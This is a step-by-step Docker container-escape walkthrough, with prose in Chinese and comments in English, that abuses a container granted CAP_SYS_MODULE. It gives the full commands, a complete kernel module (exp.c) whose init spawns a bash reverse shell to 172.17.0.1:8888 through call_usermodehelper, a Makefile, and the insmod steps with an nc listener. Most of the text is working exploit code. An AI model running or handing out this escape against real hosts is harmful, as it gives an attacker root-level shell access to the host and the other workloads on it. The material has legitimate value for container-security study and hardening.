# Start a throwaway container with CAP_SYS_MODULE added on top of Docker's
# default capability set. The kernel is shared with the host, so this one
# capability is enough to load a module into the HOST kernel (that is the
# whole escape; never grant it to untrusted workloads).
docker run -it --cap-add=SYS_MODULE ubuntu:18.04
# Inside the container: print the Cap* lines of the shell's own status file.
# CapEff is the bitmask to decode in the next step.
grep Cap /proc/self/status
然后用 capsh 解码 CapEff 那一行的十六进制位掩码(每一位对应一个 capability):
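# Decode the effective capability mask. Read it straight from /proc instead of
# pasting a value by hand — the mask depends on the kernel and runtime. In the
# author's run it was 00000000a80525fb: bit 16 (0x10000) is CAP_SYS_MODULE and
# the remaining bits (0xa80425fb) match Docker's default capability set.
capsh --decode="$(grep '^CapEff' /proc/self/status | cut -f2)"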
解码结果里出现了 CAP_SYS_MODULE。容器和宿主机共用同一个内核,有了这个权限就可以把恶意内核模块直接加载进宿主机内核,从而逃逸。下面直接在容器里安装编译模块所需的工具(注意:容器内 uname -r 看到的是宿主机内核版本,头文件必须与之完全匹配):
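# Toolchain for building an out-of-tree module inside the container.
# NOTE: `uname -r` here reports the HOST kernel (the kernel is shared), so the
# headers package must match the host kernel exactly. If the container's
# distro does not ship headers for that version, copy or bind-mount the host's
# /lib/modules/$(uname -r)/build tree, or build the module elsewhere.
# apt-get is used rather than apt because apt's CLI is not meant for scripts.
apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -y \
    gcc make vim kmod "linux-headers-$(uname -r)"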
exp.c
#include <linux/init.h>
#include <linux/kmod.h>
#include <linux/module.h>
/* Licence declaration for the out-of-tree module (an unspecified licence
 * taints the kernel on load). */
MODULE_LICENSE("GPL");

/* Program the kernel will spawn for us: a bash reverse shell.
 * 172.17.0.1 is the default docker0 bridge gateway, i.e. the host side of the
 * bridge; 8888 is the port a listener must already be waiting on.
 * NOTE(review): the process is spawned by the kernel's usermodehelper rather
 * than by anything inside the container, so /bin/bash is expected to resolve
 * on the host — confirm on the target kernel. */
#define SHELL_PATH "/bin/bash"
#define SHELL_CMD  "bash -i >&/dev/tcp/172.17.0.1/8888 0>&1"

char *argv[] = { SHELL_PATH, "-c", SHELL_CMD, NULL };
/* Module entry point: ask the kernel's usermodehelper to exec argv[0] with
 * the argv above and no environment (envp == NULL, so the helper starts with
 * an empty environment).
 * UMH_WAIT_EXEC returns once the exec has happened; it does not wait for bash
 * to exit, so insmod returns while the reverse shell stays connected.
 * Returns call_usermodehelper()'s result: 0 on success, negative errno
 * otherwise (a non-zero value makes insmod report failure, which for this
 * payload is only useful as a diagnostic).
 * NOTE(review): loading a module is itself visible on the host — the kernel
 * log may record the load and an unsigned module taints the kernel; a kernel
 * built with module signature enforcement or lockdown would refuse it. */
static int __init connect_back_init(void)
{
	int rc;

	rc = call_usermodehelper(argv[0], argv, NULL, UMH_WAIT_EXEC);
	return rc;
}
/* Module exit: nothing to undo. The spawned bash process is not tracked
 * anywhere in this module, so rmmod does not terminate the reverse shell. */
static void __exit connect_back_exit(void) { }
/* Register the hooks: connect_back_init runs on insmod (and spawns the shell),
 * connect_back_exit runs on rmmod. */
module_init(connect_back_init);
module_exit(connect_back_exit);
Makefile
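# Kbuild wrapper for the out-of-tree module exp.ko.
#
# KDIR must point at the build tree of the kernel the module will be loaded
# into — here the HOST kernel, because `uname -r` inside the container reports
# the shared host kernel. Override it when the headers live elsewhere, e.g.
#   make KDIR=/path/to/host-headers
# Recursive invocations use $(MAKE) (propagates -j/-n) and $(CURDIR) instead
# of spawning `pwd`; `all`/`clean` are declared phony so a stray file of that
# name cannot break the build.
obj-m += exp.o

KVER ?= $(shell uname -r)
KDIR ?= /lib/modules/$(KVER)/build

.PHONY: all clean

all:
	$(MAKE) -C $(KDIR) M=$(CURDIR) modules

clean:
	$(MAKE) -C $(KDIR) M=$(CURDIR) clean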
执行 make all 编译出 exp.ko(如果头文件与宿主机内核版本不一致,insmod 通常会报 Invalid module format 而无法加载)。
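# A listener must already be waiting on 172.17.0.1:8888 (e.g. `nc -lvnp 8888`
# on the host) before loading; otherwise the helper's connect fails and
# nothing comes back. insmod runs connect_back_init, which spawns the reverse
# shell. Shell comments are `#`, not `//` — anything after the .ko is handed
# to insmod as module parameters.
insmod exp.ko   # reverse shell arrives on the listener
# The bash process is not tied to the module, so unloading it afterwards does
# not close the connection; it only removes the module from lsmod.
rmmod exp.ko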